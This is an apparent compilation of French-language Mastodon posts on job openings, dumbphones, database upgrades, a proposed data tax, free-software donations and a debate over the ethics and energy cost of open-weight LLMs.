**: non, ce n'est pas vrai, mais si je ne le dis pas, ils vont me tomber dessus :-p
@oldsysops ca fait rêver, dommage que je n'y connaisse presque rien en python
@oldsysops vous avez trouvé votre perle rare finalement ?
Je vois que l'annonce est clôturée mais elle continue de me faire réfléchir
peut-être à la prochaine offre d'emploi (grosso modo y en a une par an... sans garantie toute fois)
@oldsysops C’est cool si vous avez trouvé quelqu’un qui correspond au besoin et à l’état d’esprit.
Je ne fais pas d’illusion pour l’avenir, mais je resterai à l’affût ^^
@oldsysops mais c'est pas interdit de remplir une piscine chez toi ?
@oldsysops et donc si (comme partout à mon avis) https://vigieau.gouv.fr/situation?profil=particulier&typeEau=AEP&adresse=Dunkerque,+59
bon apres y à la mer du nord pas loin et l'eau est fraîche...
RE: https://mamot.fr/@LaQuadrature/116873697053466176
Vous êtes juriste, vous voulez mettre vos compétences au profit d'une association sur le front face à la montée du fascisme, et avoir un collègue qui fait des blagues et qui parle tout le temps de chats ne vous fait pas peur ? Alors sachez que @LaQuadrature recrute !
AG57🏴☠️ a repartagéLa Quadrature du Net recrute un·e juriste pour décembre 2026 ou janvier 2027 ! Nous cherchons sur Paris une personne avec une expérience préalable, professionnelle ou militante. Nous avons besoin de quelqu'un capable de vulgariser nos sujets, d'appuyer les autres salarié·es et membres, qui pourra transformer des sujets juridiques en objets politiques, et nous privilégions les profils militants. ⬇️
Appel à bonnes âmes 😁
Mon compagnon, cet homme incroyable, m'a fait un script python pour me permettre de tamponner des pièces de procédure en 3 secondes.
En ayant parlé à d'autres, il s'avère qu'iels seraient intéressé.e.s mais ne sont pas sous linux (cheh)
J'ai deux questions :
- où mettre son dépôt git pour pouvoir le partager
- est-ce qu'il y a des trucs pour pouvoir faire fonctionner facilement ce truc sans passer par un terminal => le rendre humain compatible 😁 et éventuellement mac et windows accessible
Tout en réalisant le traitement sur le PC et non en ligne (secret pro 4ever)
Merci d'avance pour votre aide
I might have found the dumb phone I want. The #SidePhone seems to be Android-based (which lets me expect some wifi tethering) and it comes with replaceable keyboards — including a compact QWERTY. Has anyone heard of it, or tried it?
(The only drawback is the price tag, around 300 € with the extra QWERTY keeb. Sigh.)
@fabi1cazenave je le trouve très limité (pas de 5G, 64Gb sans slot SD, pas de NFC,...) compte tenu du tarif
Dommage l'idée est bonne
@missbullitt Les dumbphones 5G, à ma connaissance ça n’existe pas. Si tu en connais un (ou n’importe quel dumbphone avec partage de connexion), le sujet m’intéresse vivement.
@fabi1cazenave je ne connais pas le marché des dumbphones, j'ai des besoins trop avancés pour que je sois la cible. Désolée
@fabi1cazenave @missbullitt Chez Free (je n'ai pas cherché pour les autres opérateurs), sans la 5G (et l'abonnement qui va avec, donc pas celui à 2€), pas de VoNR et donc une couverture assez pourrie à certains endroits pour les appels normaux, même avec VoLTE (4G) activé.
https://assistance.free.fr/articles/1820
https://mobile.free.fr/couverture
@ciourte @missbullitt Oui, c’est un monde de merde, mais il est déjà un peu moins pourri si je peux avoir un téléphone qui tient dans une poche, avec lequel je peux passer un appel en cas de besoin ou d’urgence, et qui ne me dilue pas mon attention le reste du temps.
Actuellement je n’ai *pas* de téléphone du tout, faute de disposer d’un truc à peu près correct pour mon usage ; donc même juste une couverture partielle, ça serait déjà un énorme progrès.
@fabi1cazenave @missbullitt Je disais ça parce que je capte un peu à seulement 2 endroits quand je suis à la maison de campagne familiale et que j'avais vérifié la couverture réseau à un moment pour voir que c'est couvert uniquement en 5G. 😄
@ciourte @missbullitt Je constate les limites de mon tél 4G dans le TGV Paris-Grenoble aussi. Balek. Mon problème c’est juste que mon bananaphone 4G ne fonctionne quasiment plus (émettre un appel requiert entre 10 et 50 tentatives…).
@ciourte @missbullitt Oh bah tiens : je trouve un smartphone suffisamment compact (4”), pas trop cher (175 $)… mais 4G only. Comme quoi.
https://aiphor.com/products/bluefox-nx1-4-0-android-smartphone?variant=54544491348041
@fabi1cazenave Je n'ai pas compris en quoi c'était un dumbphone, à part la taille/forme. 😅
@ciourte La taille, la forme, le clavier.
J’ai un peu fait le tour du sujet, et, à ma connaissance, si on veut un dumbphone avec partage de connexion, c’est forcément une base Android de nos jours.
@fabi1cazenave cette chaîne devrait t'intéresser https://www.youtube.com/channel/UCFtVwG0NFd6gT3TXfMCU7oA
@Walatepabri Oh merci ! Étonnamment, YouTube ne m’avait jamais recommandé de chaîne sur le sujet, mais depuis que je suis tombé sur le #SidePhone hier l’algo me pousse tout un tas de contenus de ce type. J’ai l’impression de tomber dans le même genre de terrier de lapin qu’avec les claviers ergonomiques…
@fabi1cazenave
J'espère que tu partageras tes trouvailles alors.
@Walatepabri
@PacoVelobs C’est une chose à craindre, en effet. De ce que je vois à gros grain :
– les alternatives à Android n’existent pas (non maintenues, pas finies…)
– il y a un segment pour des téléphones Android au format dumbphone, entre 200 et 300 € (ce SidePhone est celui qui me paraît le plus abouti) ;
– il y a un autre segment pour des smartphones à écran très compact mais épais (le Unihertz Jelly Star semble être la réf).
Je continue de creuser le terrier de lapin.
@PacoVelobs J’ai vu passer plein de devices à e-ink, dont un avec clavier physique (!), mais ça n’a pas l’air au point techniquement, à mon grand regret.
Et sinon, y a un projet de « petit » smartphone (5.2” quand même…) ici :
https://enoughphone.com
@oldsysops Oui, c’est hors de prix. Mon propre PC de boulot a coûté moins (occasion). Mais je ne veux *pas* d’un smartphone moderne : trop grand, trop encombrant, trop aliénant.
@oldsysops @PacoVelobs @Walatepabri Je crois que j’avais payé 80 € pour mon Banana Phone sous KaiOS. Un feature phone avec point d’accès, que j’ai utilisé abondamment, et même un bout de GPS qui m’a dépanné une ou deux fois. Le meilleur téléphone que j’aie jamais eu… mais il est en fin de vie, là.
@fabi1cazenave Le Mudita Pure était sympa, mais pareil, horriblement cher.
Et je crois qu’ils le vendent plus (au profit du Kompakt, qui a certes des arguments, mais est beaucoup moins dumb…).
#jerecherche un post lead-dev, solution architect ou product manager. Je dev en Python, PHP, Bash, JS front, PqSQL, etc…
Bonjour les mastonautes.
J'attaque une petite semaine de 4 jours, puis un weekend de 5j puis une semaine de 3j ... et après 2 semaines de vacances 🥳
Je crois que je suis déjà en vacances dans ma tête.
Bon lundi pas trop chaud 🤗
J'ai l'impression que c'est une soirée qui n'accepte pas l'arrivée du sommeil 🤔
Ça va être compliqué demain : je taff en début d'aprem.
@arthurr quelle idée de travailler ! 😆
@Kolibri_liberee idée de merde.
Mais au moins mes serveurs de bases de données sont à jour.
Ça impressionne les gens... 😁
@oldsysops @Kolibri_liberee j'avais du 15 et du 17 : tout le monde en 18.
Une dizaine de serveurs (plus les standby).
Prévu : 2h de coupure, mais prod rétablie en moins de 30mn (hors standby).
J'attends la 19 avec impatience : checksum en live + repack intégré 🤗
@oldsysops @Kolibri_liberee pg_upgrade - k : ça fonctionne très bien, jamais eu de surprise.
Si c'est bien préparé, ça va aller.
Pourquoi pas 18 ?
@arthurr je viens de regarder la vidéo sur mesh c'est hyper intéressant
@Kolibri_liberee oui, ça bouge vite et bien. J'aime beaucoup ce projet🤗
@arthurr très anar comme façon de penser
@Kolibri_liberee 🏴☠️🏴☠️🏴☠️
Mes parents d’élèves de seconde et/ou profs sûrs : les gamins ont cours après le stage de seconde ou c’est juste un préalable aux vacances ?
@Vive_Levant non il n'y a pas cours. Le stage c'est juste pour occuper les gamins pendant le bac. C'est pas noté, il n'y a pas de rapport à faire.
@GreenWitch ok, ça peut se faire à l’étranger ?
@Vive_Levant je pense que oui. Il me semble que les séjours linguistiques sont acceptés. De toute façon il y a plein de gamins qui trouvent rien donc je crois qu'ils sont assez souples.
@GreenWitch ok, donc allez voir les cousins à Shanghai pendant 3 semaines et jeter l’enfant en stage chez la cousine pendant 2 semaines, ça peut le faire.
@Vive_Levant il faut poser la question au lycée, c'est eux qui acceptent ou non le stage. Mais de toute façon, sauf si ça change l'an prochain, ne pas avoir de stage n'est pas pénalisant alors vous faites bien ce que vous voulez.
@Vive_Levant non y a plus cours après, les profs sont mobilisés pour les corrections, les oraux. Certains établissements essaient de rouvrir après le stage mais sans succès (à quoi bon 3 semaines après le conseil de classe?)
prenez soin de vous !
Si vous êtes un Debianiste très confirmé (et un peu militant) sur Paris , je recherche des experts ..
Y en a plein ici !
@Bristow_69 oui , c'est pour ça que je sors du bois 😉
C'est quoi comme type de recherche ? Un recrutement ?
Après, je ne suis pas sectaire, si vous connaissez très bien , Gnome, Wayland .. enfin surtout le poste de travail Linux ..
@christophecazin ha ! Plop alors. Disponible en PT (Private Toot) pour toutes questions ou échange d'autres moyens de communications.
@christophecazin ha ! Plop alors. Disponible en PT (Private Toot) pour toutes questions ou échange d'autres moyens de communications.
@lutindiscret @christophecazin @freexian Je crois que Christophe nous connaît, et si nous sommes bien des experts, nous ne sommes pas spécialement sur Paris, et j'imagine que Christophe cherches des profils à embaucher.
Ceci dit j'aimerai bien que Freexian soit impliqué dans les projets du ministère ne serait-ce que pour mettre à disposition notre infrastructure de CI/CD Debian (Debusine) et que le ministère participe au financement du développement de nouvelles fonctionnalités.
@rhertzog @lutindiscret @freexian
Oui, bien sûr .. Pour l'instant , j'arrive à décrocher des budgets externes au MI sur des sujets bien précis (comme 400 k€ pour l'accessibilité) que j'investis plutôt sur les interfaces utilisateurs (LibreOffice) avec Hypra ..
On aura plus d'argent si on arrive à se débarrasser d'un max de licences propriétaires qui sont dépensées sur le poste de travail.
Pour l'instant, on mise surtout les forces internes ...
@christophecazin heu... Des fois que... On a déjà travaillé sur des projets MIM (educ nat, douanes...) et on peut rendre des applis webs accessibles : on est spécialiste dev front et backend java. Quant à être engagé... Ça va être compliqué de faire plus 😆. Si jamais... @codelutin
@lutindiscret @codelutin@mastodon.libre-entreprise.co
Oui je connais codelutin
Mais c'est plus difficile et souvent plus cher de passer sans marché avec un DC4 . On a plus de facilités de négociation avec des indépendants qu'avec des entreprises qui ne sont pas déjà dans un marché contractuel.
@christophecazin alors je ne suis pas très au fait des questions administratives mais on a déjà facturé des prestas comme des indépendants (alors oui des montants inferieurs à certains seuils pour respecter la réglementation mais pour des audits, conseils ou petits dev / prototypage ca passe). On est pas bureaucratique : si un indep peut faire, on peut suivre le meme process de contractualisation et de facturation sans se lancer dans fes gros trucs. Dans le doute, n'hésite pas à nous contacter.
@9x0rg @christophecazin @attilax
Plop !
Hello !
On est 3 sur Paris.
Que peut-on faire pour toi, Christophe ?
Mardi 30 juin et Mercredi 1er juillet nous étions au Salon Souveraineté Numérique à Paris. L’occasion pour nous de vous présenter #Tenzu accompagnés de nos mascottes en chair et en peluches.
Mais aussi d’échanger avec les copains de @LaSuiteCoop @bearstech et bien d'autres au sein du village #CoopTech.
Le SITPI est le syndicat intercommunal dont la ville d'Échirolles est membre.
C'est le SITPI qui a créé et qui gère colter.social, l'instance Mastodon ouverte à l'ensemble des collectivités territoriales.
Beaucoup d'autres projets dans les tuyaux et un poste technique passionnant. Si rien ne vous fait peur dans le déploiement de solutions numériques, rejoignez le SITPI !
→ https://www.emploi-territorial.fr/offre/o038260629000908-administrateur-reseaux-systemes-confirme
Blog post: Inspired by the video I just boosted - some honest thoughts on my AI remorse from my experiments earlier in the year.
It was bad, and I have SERIOUS regrets.
The TL;DR version is essentially this: Writing code is not just creative in the "writing code is an art as well as a science" sense, but also in that every line of code you don't write is a million tiny design decisions you are NOT making.
"ethically fucked averaging machine" is genius. It's my new favorite term for AIs.
@oldsysops @MonniauxD @flomaraninchi
Maintenant ont bloque des AS entiers (alors pas au niveau réseau on est pas encore assez énervé), mais on fait la liste des ranges et on a des ipset équivalents ban sur pleins de machines.
Des nlles des infras de recherche... "Comme vous avez certainement dû le constater, ces derniers temps la plateforme est régulièrement fortement ralentie. Nous subissons des vagues de crawling de bots IA assez agressifs (pour l'apprentissage et l’entraînement des outils d'IA générative ...) qui surchargent le système et rendent son utilisation très compliquée. (...) une maintenance est prévue lundi pour la mise en place de solutions pour lutter contre ces bots."
Voilà voilà...
@flomaraninchi à ma toute petite échelle je commence à sentir le traffic sur mastodon et sur mon site perso. rien de méchant (encore), mais ça augmente en permanence.
je teste avec iocanine et anubis, je cherche des outils plus agressifs. c'est pénible. les chatbots ont tué l'Internet.
@oldsysops Mais que fais-tu déjà debout ?
@FlohEinstein our technology is absolutely magic.
Think of computers and processors, we literally etch patterns into rocks and metals and then make it think by inducing it with lightning.
Explaining that shit 300 years ago would have gotten you burned at the stake.
@hypolite @FlohEinstein was just thinking how to describe it to someone 300 years ago heh.
@hypolite @FlohEinstein @Sonikku Maybe they cannot think but I'm almost convinced they are capable of malice.
@hypolite @FlohEinstein @Sonikku I try not to think of computers as "beings" but when you have certain errors that seem untraceable, intractable, inattributable it becomes really difficult. Then, the computer's behaviour seems like an active act against me personally. Especially if the dammed thing works as intended when somebody else uses it.
Maybe I have picked up the advisor negation field https://phdcomics.com/comics/archive.php?comicid=821
Maybe it is an active malicious act.
Maybe it's just bad memory chips.
@FlohEinstein And those of us able to fix these indistinguishable problems are wizards. I guess magic is still alive and well.
J'aimerais dire que j'ai un quelconque mérite dans le process, mais je peut juste dire que j'ai des collègues formidables !!
#iso27001
pas d'info sur le disque à changer, ni sur celui à garder, ni sur les raisons de la panne ni sur les horaires d'intervention, ni sur le fait que le backup a bien été fait...
L'IA c'est le futur, c'est ça ? Bref, je suis disposé à faire un retour à quelqu'un d'#OVH pour leur dire de revoir leur copie, car ce n'est pas prêt du tout leur Beta...
je ne comprends pas pourquoi l'ia ne m'a pas orienté vers le bon formulaire qui prend lui bien en charge toutes ses questions pertinentes sur l'état du serveur.
@oldsysops je transmets
@oldsysops il avait l'air sacrément blasé. Pour l'entendre en parler chaque semaine, les devs subissent aussi la situation
Y a plus personne au PS qu'à un peu bossé la neutralité du net ?
"Instaurer une taxation des flux de données numériques distribués sur le territoire français, au taux de 0,10 euro par gigaoctet, afin de financer l’infrastructure du réseau utilisé par les plateformes"
Sans parler du fait que si ça s'applique à tout le monde, c'est une TVA numérique qui va donc peser sur les plus pauvres. Dans ce cas de figure, imaginons qu'un jeu uniquement dispo en démat comme GTA 6 pèse 150 Go (ça sera plus), bim 15 balles de taxe en plus de la TVA. Et qui paye ? L'éditeur du jeu ? Læ joueureuse ? Les deux ?
https://projet-socialiste.fr/projet/vivre-libres/#chapper-aux-nouvelles-servitudes-numriques
@shaft Bah si c'est l'éditeur du jeu, ça veut dire que le prix augmentera d'autant et c'est læ joueureuse qui paiera à la fin, non ?
@jeeynet Yep. Mais y a moyen de faire payer les 2. 30 balles minimum de surcoût sur ton GTA 😬
@jeeynet Dans tous les cas, c'est personne qui achète qui paie le malus… C'est une TVA privée.
> afin de financer l’infrastructure du réseau utilisé par les plateformes
Soit pour financier ce qui bénéficiera à des boites capitalistes : plus d'infra/infra plus performance = plus de ventes et de « trucs dans le clouad » donc plus de profits dans la poche des actionnaires…
Y a juste rien qui va dans une telle idée pondue par des gus qui croient l'informatique c'est gogole et M$…
Par ailleurs, ça aurait déjà été en projet, et c'est pas passé du côté de la Hongrie sous Orbán
🤡
@shaft
Meuh non, c'est juste une taxe sur le p2p, c'est contre le piratage ! /j
Mais sinon, ça ne sera jamais l'éditeur qui paiera, même si la loi l'oblige, le prix pour dl en France sera augmenté pour compenser la taxe...
Et bon encore GTA la taille se voit plutôt bien, par contre la consommation en bande passante d'une vidéo youtube ou pire de la VoIP là par contre c'est pas les politiciens qui vont savoir.
(Et supprimer vos emails les gens, 16Ko c'est lourd enfin, les pauvres disquettes :D)
@lanodan Les vidéos de chat en 240p uniquement.
Heureusement que l'algorithme de Google sur YT semble privilégier les "short" en ce moment 🤔
@shaft ils sont loin les mousquetaires contre hadopi ><
@martouf Ou tout simplement le règlement européen sur la neutralité du net, adopté grâce au travail d'Aurélie Filippetti quand elle était ministre sous Hollande 🤡
c'est juste une taxe supplémentaire.
@shaft combien coûtera le fait de regarder l'allocution du nouveau président de la république issu du PS en 4K via IPTV ? 🤡
@shaft Je ne sais pas si je dois répondre "Y'a encore des gens qui s'intéressent à ce que dit le PS?" ou te saluer pour ton abnégation à lire la diarrhée explosive et paniquée qui leur sert de programme. Ça a dû être pénible, j'aurais pas eu le courage.
@shaft beaucoup plus si on intègre l'ensemble des flux du cycle de vie du jeu : conception, développement, commercialisation, marketing, installation, mise à jour, données de jeu, données de la plateforme d'hébergement du jeu.
C'est absolument n'importe quoi cette idée !
@shaft en vrai si c'est les plateformes qui payent, why not. Mais faire payer le contribuable là-dessus, restaurez la dîme, la taille et la gabelle, ça ira plus vite.
@thinmax L'abonnement Netflix qui prend +50€ dans les dents, ça va être rigolo
@shaft ah ben oui, c'est bien pour ça que taxer c'est pas l'alpha et l'oméga. Alors qu'imposer c'est mieux.
@thinmax @shaft Ça n’a jamais existé, les plateformes qui payent.
Toute taxe sur une entreprise finit incorporée dans ses coûts de fabrication, et donc dans ses prix. Si ça amène les prix trop hauts pour les clients, l’entreprise peut couler (quand est-ce qu’on taxe les entreprises d’IA à hauteur de leur pollution ?).
Donc quand #Enedis a annoncé que les clients ne paieraient pas pour le remplacement des compteurs #Linky, ça voulait seulement dire qu’il n’y aurait pas une ligne « coût du Linky » sur la facture. Mais pour équilibrer les comptes, il a bien fallu que ce coût soit facturé à la fin.
À l’inverse, toute subvention à des acheteurs aboutit toujours à une hausse des prix (coucou les #APL et les loyers).
Par contre, taxer directement les riches, ça marche. Taxer les dividendes, ça marche.
@FredricT Je m'étais imaginé qu'on pourrait au final ne taxer que le capital, tout le capital à 1% par exemple, mais d'une manière peut-être un peu compliquée :
Imaginons j'achète une maison. La première année, j'en possède 100% et toute la jouissance. La deuxième année 99% et toute la jouissance, etc (1% rachetable appartenant aux communs). Et quand je la vends, je ne touche que ma part ; si j'en fais hériter quelqu'un, il n'y a que ma part qui est transmise.
@shaft 10 centimes le Go ? Au-delà de la neutralité du net, c’est hors de prix…
@breizh vu que le but c'est de taxer les méchantes plateformes (et tuer les structures type Wikipedia en France mais passons), sur un lien 10 Gbps, c'est 10 cts la seconde en supposant qu'il débite à 1 Go/s. 360€ de l'heure. 8640€ / jour, plus de 3 millions d'euros à l'année. Une pauvre fibre 10 Gbps qui envoie 1 Go/s de chatons rigolos
Pour financer la rente des BOFS (cf https://soc.kouett.net.eu.org/objects/c34d49e6-1caa-40ef-a121-ddf303a9e1d1 )
Comme chaque année au 24ème, nous faisons des dons à des logiciels libres.
Cette année nous avons pu aider 38 projets : https://github.com/24eme/banque/blob/master/data/dons.csv
#Fatfree #Pulsar #Yunohost #Framasoft #Borg #Debian #tinc #php #etherpad #gnome #git #organicmaps #mumble #fdroid #kitty #signal #ripgrep #fzf #fd #tpope #comaps #mastodon #liberachat #Couchdb #SponsorBlock #Anubis #GrapheneOS #GNU #FFMPEG #Logseq #FairScan #NewPipe #Arch #GadgetBridge #FossifyCalendar #Letsencrypt #Phpactor #Sudo
1/2 🔽
Inspiré par l'initiative @copiepublique, nous avons décidé d'indexer nos dons au chiffre d'affaire produit (0.5%) et au bénéfices (5%). Cette année, ça représente 2 016 €.
Concernant la méthode, chaque salarié⋅e du 24ème a disposé de 14 parts de 24€ à répartir aux projets libres de son choix. Ensuite, nous les avons mis en commun pour répartir les paiements.
2/2
Bonjour les mastonautes.
En allant me coucher, j'ai décidé de fermer ma porte de chambre (je ne la ferme jamais) pour ne pas être embêté par le chaton.
Astuce pour plus tard : vérifier que le chaton n'est pas enfermé avec la cocker et moi dans la chambre.
Je l'ai pas entendu de la nuit, mais à 5h un monstre aux dents pointues a sauté sur mes pieds.
L'idée était bonne pourtant !
Bon jeudi 🤗 (vais essayer de redodo)
Edit : on est mercredi 😭
@arthurr 🤣 trop drôle ! Merci pour le rire. Histoire similaire le jour où j'ai voulu protéger une plante des escargots, le loup était dans la bergerie (cloche)
@arthurr 5h, c’est l’heure idéale pour aérer. Quel gentil monstre !
@arthurr 😂
bien joué le chaton ! 😜
@pasqualeberesti je crois qu'il s'est même pas caché... J'ai pas été très bon
@arthurr il fait un très bon travail de réveil 😂 bon mercredi.
@arthurr J'adore l'idée et ... son résultat 😅 Malin comme tout ce p'tit là 😄 Bonne journée 😘
Salut @Vero 😘
Ça c'est fini par des gros câlins ! Je comprends pourquoi N2 veut le garder dans sa chambre : il est super mignon et tout doux et tout agréable.
Que ton mercredi soit tout doux.
@arthurr bah et les mastodoniennes ?
@Kolibri_liberee ok, demain je remplace les mastodoniens avec les mostodoniennes (c'est galère à écrire y'a trop de N).
Les mostomachines ?
@arthurr mastomachines ? Tu m'as prise pour chatgpt 😅 sinon mastonautes ?
@Kolibri_liberee tu crois que je vais m'en rappeler demain matin avec mon cerveau de vieux ?
Je vais essayer ... sinon tu me reprends !!!
@arthurr 🤣 je vais dresser Kady pour qu'il te surveille
@oldsysops @arthurr validé, mais je trouve mastonaute plus marrant à titre perso
@Kolibri_liberee @oldsysops m'embrouillez pas !!! 🤯
@arthurr @oldsysops OK gandalf
@Kolibri_liberee @oldsysops gandalf ? pas compris la ref :)
J'en vois certains trouver en les LLMs "opensource" une solution. Mais ça n'en est pas une:
- les données d'entraîmenent viennent d'où ? Sûrement quand même volées.
- l'entraînement a coûté beaucoup d'énergie.
- la faire fonctionner va coûter beaucoup d'énergie.
- la qualité des données en sortie sera toujours douteuse (+risques juridiques, sécurité, etc.)
ça ne résoud ni le pillage des créateurs, ni l'empreinte écologique monstrueuse, ni la qualité des données d'entraînement, ni les biais...
@sebsauvage Et les études préliminaires semble indiquer que ca rend débile (le terme poli c'est cognitive offloading -> cognitive debt)
À noter que la plus grosse étude sur le sujet n'a toujours pas été peer reviewed 1 ans après donc à prendre avec des pincettes.
@sebsauvage Typique des technobranchouilles allergiques à l'éthique qui dépolotisent toute la question par flemme de se connecter 2 neurones…
@sebsauvage Je suis globalement d'accord mais que faudrait-il faire alors?
@sebsauvage je dirais que le seul bénéfice, c'est de ronger ceux des grosses boites d'IA mais c'est sur que le fond est le même
@sebsauvage
Oui et non. Oui, tout ce que tu dis est vrai. Le souci, c'est qu'une fois qu'il est là, il est là. Alors la question est de savoir ce qu'on en fait avant que d'autres ne le fassent avec des ambitions fort discutables.
Et il y a les « petits LLM », avec des possibilités plus restreintes et qui peuvent s'insérer dans des usages raisonnés.
C'est un peu comme pour l'environnement: choisir entre préservation et conservation: à quel moment préserver et à quel moment « faire avec ».
c'est comme dire "il n'y a pas d'autre alternative", si on a le choix.
Pour beaucoup d'entre nous le problème que pose l'ia est d'ordre moral. (et avec la crise climatique, c'est aussi bientot un problème de survie).
mais bon #dontLookUp, on pourra pas dire qu'on a pas été prévenu.
Chacun fait comme il veut, pendant qu'il le peut encore (et vu le prix de la ram, ca va pas etre long avant que de moins en moins de personne ne puissent se le permettre)...
@oldsysops On arrive clairement à un goulot d'étranglement. L'IA réquisitionne les ressources utilisateurs et autres. Quand il n'y aura plus d'utilisateurs à quoi servira l'IA ?
@Framatophe @sebsauvage
@leontolog
Oui. On peut aussi attendre la fin de l'abondance énergétique.
Sauf qu'entre aujourd'hui et ce moment-là, les discours moraux, aussi éclairés qu'il soient, ne changeront rien à la profondeur de modification des usages numériques et le changement économique qui sont imposés par les LLM. Pour sauver les meubles il va falloir faire autre chose que de simplement dire « c'est pas bien » (même si je suis d'accord)
@oldsysops @sebsauvage
@Framatophe
Remplacer "LLM" par "dictature" et constater l'ampleur du problème actuel.
(parce que concrètement, c'est la dictature d'une technologie)
@leontolog @oldsysops
@Framatophe Entièrement d'accord mais quoi ?
On a d'un coté un dirigeant fou qui appuie à fond sul'champignon des LLMs (et pas que), et de l'autre une poignée d'imbéciles qui veulent leur modèle, souverain, libre, peu importe.
Les boycotter ? Perso je n'y crois pas. Mettre le feu à leurs datacenter ? Outre qu'il va falloir être nombreux et partout, on va encore se faire traiter d' "estrême-gochiss qui comprennent rien au progrès" se faire taper dessus et puis les assurances payeront et ça continuera.
Je sais perso pas. Comme tout le monde je suis aux aguets, prêt à sauter dans le premier train qui prend la bonne direction
@oldsysops @sebsauvage
et j'attends "l'enshitification", le retour sur investissements des personnes qui ont beaucoup investi dans l'ia et les datacenters qui vont vouloir leur argent et leur bénéfices car pour le moment c'est un gouffre sans fond, un pari a x milliards de dollars.
bref, je n'utilise pas, je minimise mon exposition, je "boycott" et j'attends la fin (de l'ia ou du monde... je ne sais pas ce qui va arrivé en premier)
et j'attends "l'enshitification", le retour sur investissements des personnes qui ont beaucoup investi dans l'ia et les datacenters qui vont vouloir leur argent et leur bénéfices car pour le moment c'est un gouffre sans fond, un pari a x milliards de dollars.
bref, je n'utilise pas, je minimise mon exposition, je "boycott" et j'attends la fin (de l'ia ou du monde... je ne sais pas ce qui va arrivé en premier)
@Framatophe L'aspect ineluctable des LLMs fait partie du discours marketing de ces boîtes. Tout comme avant lui le Metaverse et les NFT.
@sebsauvage
Non, je n'ai pas parlé de l'inéluctabilité qui nous est rabâchée. Je pose un constat : qu'on le veuille ou non des LLM sont là. J'ai montré combien laisser les choses se faire nous mène vers du techno fascisme. Fermer les yeux, jouer les sainte Nitouche ou répéter des discours moralisant ne nous aidera pas. La question est : que faire ?
@sebsauvage
Je donne un exemple : en Alsace l'entreprise Liebherr a carrément modifié une chaîne et fait de gros investissements pour construire des moteurs thermiques pour les data center. La logique est depuis longtemps enclenchée, au point qu'elle modifie concrètement les chaînes de production. Si à titre individuel on n'utilise pas les LLM, cela ne change pas grand-chose en réalité.
@Framatophe Le "déjà là" est un des arguments de la croyance dans l'inéluctable : https://doi.org/10.64628/AAK.gykec93ad
Il impose l'idée qu'il faudrait "faire avec", au moins dans une certaine mesure.
Or, pour ce qui est "déjà là" nous devrions pouvoir débattre de bien d'autres options : faire sans, faire contre, faire malgré, faire autrement, ...
Nous devrions comprendre pourquoi c'est "là" et pouvoir décider d'en maintenir ou non les conditions de possibilité.
@sebsauvage @Framatophe Je n'aurais pas choisi cette comparaison. Dans mon entourage pro ou pas pro, je n'ai jamais eu personne à prendre au sérieux NFT ou metaverse.
L'IA générative pour beaucoup c'est déjà ancré dans leur quotidien. L'adoption de l'IA générative n'a rien à voir. On est sur un problème d'une toute autre ampleur.
@Framatophe @sebsauvage Faut juste arrêter d'utiliser ces merdes, personne n'y gagnera rien à par 3~4 fachos.
@sebsauvage ni le travail des petites mains sous payées pour accomplir des tâches simple afin de créer les données d'entraînement avec les conséquences psychologiques...
@sebsauvage Ça dépend de l'objectif. Je suis d'accord qu'essayer de répliquer les énormes modèles propriétaires "mais en libre" causera les mêmes problèmes.
Mais je suis curieux de voir ce que l'on obtiendrait si on inversait la logique. Au lieu du modèle généraliste le plus grand possible entraîné sur le plus de données possible, élaborer le plus petit modèle spécialisé capable de faire un truc utile. Un exemple : un petit modèle entraîné sur toute la documentation logicielle libre (GFDL, info & man pages, docs de langages de programmation, etc.) + juste assez de texte générique (libre bien sûr, p. ex. Wikipedia) pour être capable de conversation simple. Est-ce que ça donnerait un truc qui peut faire de l'inférence en local pour m'aider à composer des commandes ou programmer, sans halluciner des infos inexistantes ? ou en hallucinant beaucoup moins souvent que les modèles généralistes, ce qui suffirait déjà à être plus utile qu'eux. S'il était possible de converser avec de la documentation de qualité sans être pollué par tout le reste (de qualité douteuse) trouvé sur le web, ça ajouterait une modalité très utile en plus des moyens existants de consulter de la documentation (accès par index ou table des matières, recherche full-text, etc.).
Pour ce type de modèle spécialisé, pas besoin de piller (docs libres), et moins besoin d'énergie (petit modèle). Ça pourrait nous ramener à un rapport favorable entre bénéfices et externalités négatives.
@Guillawme
Les LLMs (que les spécialistes appellent "étroites") pourraient rendre des services sans la consommation énergétique monstreuse des LLM généralistes.
Entraînées sur un ensemble données plus restreint et maîtrisé, ça pourrait donner des résultats plus intéressants.
Mais entraîner une LLM reste une opération lourde, et tout le monde n'a ni forcément le matériel ni les compétences pour créer un bon jeu de données.
@sebsauvage Ça parle aussi d’« open weights ». Comme si on disait que Windows ou Photoshop était « open executable » ou « open instructions ». 🙄
@aruban35mm
oui... comme si les poids d'une LLMs étaient aussi facilement inspectables qu'un code source C++. C'est un véritable foutage de gueule, cette notion d'«open weights».
@sebsauvage
Je bondis quand on parle d'Open source pour ça. Open weight est a peine moins faux.
Le terme le moins a l'ouest c'est freeware.
@aruban35mm
Un "open weight" n'est pas plus auditable qu'un logiciel compilé.
On sort totalement de la notion d'Open source.
Et les risques sont connus :
https://layerxsecurity.com/generative-ai/privilege-escalatione/
@sebsauvage complètement ok
la réflexion autour des licences libres lancé par RMStallman à été une grande aide aux techno-critiques et à l'anticapitalisme mais s'est diluée dans le mouvement 'open',a perdu sons sens éminemment politique depuis 2000
toujours la 'Technique' masque ses exactions et ses profiteurs, revenir à une pensée de la seule fonctionnalité est comme accepter les fétiches des pouvoirs aliénants et destructeurs.
toujours des mauvaises réponses à des mauvaises questions 
@sebsauvage sans les données utilisées pour l'entraînement, aka. les sources, c'est pas open source, c'est freeware (at best)
@sebsauvage question additionnelle que je ne vois jamais discutée, c'est la soutenabilité dans le temps de l'entraînement de ces modèles open weight.
Contrairement à l'open source, l'entraînement ne peut pas être le fait d'un individu, et si déjà dans l'open source dans cette configuration y'a pas assez de sous, oa question c'est comment ça va se passer quand les modèles open weight ne seront plus subventionnés pour leur entraînement.
Du coup pour moi c'est au mieux un pis aller
Notes vite fait :
* La liberté, dans le monde du numérique, inclue la possibilité d’étudier et de modifier => Tout modèle qui ne fournit pas le code, les poids et la bdd d’entrainement est privatif.
* Il serait tout à fait possible de créer des bdd coopératives sur le modèle de wikipédia ou osm.
* Rien n’oblige à créer de modèles généralistes, qui feront forcément moins bien que des modèles spécialisés à quantité d’énergie équivalente.
@sebsauvage C'est pour ça que les mails d'Infomaniak pour pousser leur IA "souveraine" et "respectueuse" me chagrine profondément de leur part...
Je connais quelqu'un, indépendant, qui a un site wordpress pour son activité, hébergé chez OVH, et parfois il a un mail disant que le site est tombé car "trop de requêtes".
